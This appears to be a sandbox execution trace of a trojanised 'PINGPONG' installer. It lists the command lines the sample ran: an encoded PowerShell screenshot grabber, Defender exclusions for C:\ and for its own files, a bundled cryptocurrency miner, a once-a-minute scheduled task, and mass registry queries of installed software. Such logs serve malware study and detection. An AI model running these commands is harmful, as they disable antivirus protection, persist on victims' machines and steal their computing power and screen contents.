AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pxxljhvx\pxxljhvx.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\installer.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA55.tmp" "c:\Users\Admin\AppData\Local\Temp\pxxljhvx\CSCC19428E585774D47A6EEB9E550A8F2.TMP"
C:\Users\Admin\AppData\Local\Temp\installer.exe
C:\Users\Admin\AppData\Local\Temp\installer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq PINGPONG.exe" | %SYSTEMROOT%\System32\find.exe "PINGPONG.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "USERNAME eq Admin" /FI "IMAGENAME eq PINGPONG.exe"
C:\Windows\SysWOW64\find.exe
C:\Windows\System32\find.exe "PINGPONG.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath \"C:\\\""
C:\Users\Admin\AppData\Local\Temp\temporary789373373\temp.bin
C:\Users\Admin\AppData\Local\Temp\temporary789373373\temp.bin
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\temporary789373373\temp.bin'
C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
"C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'temp.bin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\rundll64.exe'
C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\resources\miner-win32-x64.exe
C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\resources\miner-win32-x64.exe --config C:\Users\Admin\AppData\Roaming\PINGPONG\miner_config.json --socket \\.\pipe\PINGPONG
C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
"C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\PINGPONG" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1580 --field-trial-handle=1736,i,14897649156640550422,16921588889060945531,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
"C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\PINGPONG" --mojo-platform-channel-handle=1800 --field-trial-handle=1736,i,14897649156640550422,16921588889060945531,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rundll64.exe'
C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
"C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\PINGPONG" --app-path="C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2628 --field-trial-handle=1736,i,14897649156640550422,16921588889060945531,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "rundll64" /tr "C:\Users\Admin\AppData\Local\rundll64.exe"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{63880b41-04fc-4f9b-92c4-4455c255eb8c}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7DAD0258-515C-3DD4-8964-BD714199E0F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BF08E976-B92E-4336-B56F-2171179476C4}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d87ae0f4-64a6-4b94-859a-530b9c313c27}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef5af41f-d68c-48f7-bfb0-5055718601fc}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\36c3a589-07cb-5a5c-93f2-7ca0c417a328
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\system32\reg.exe
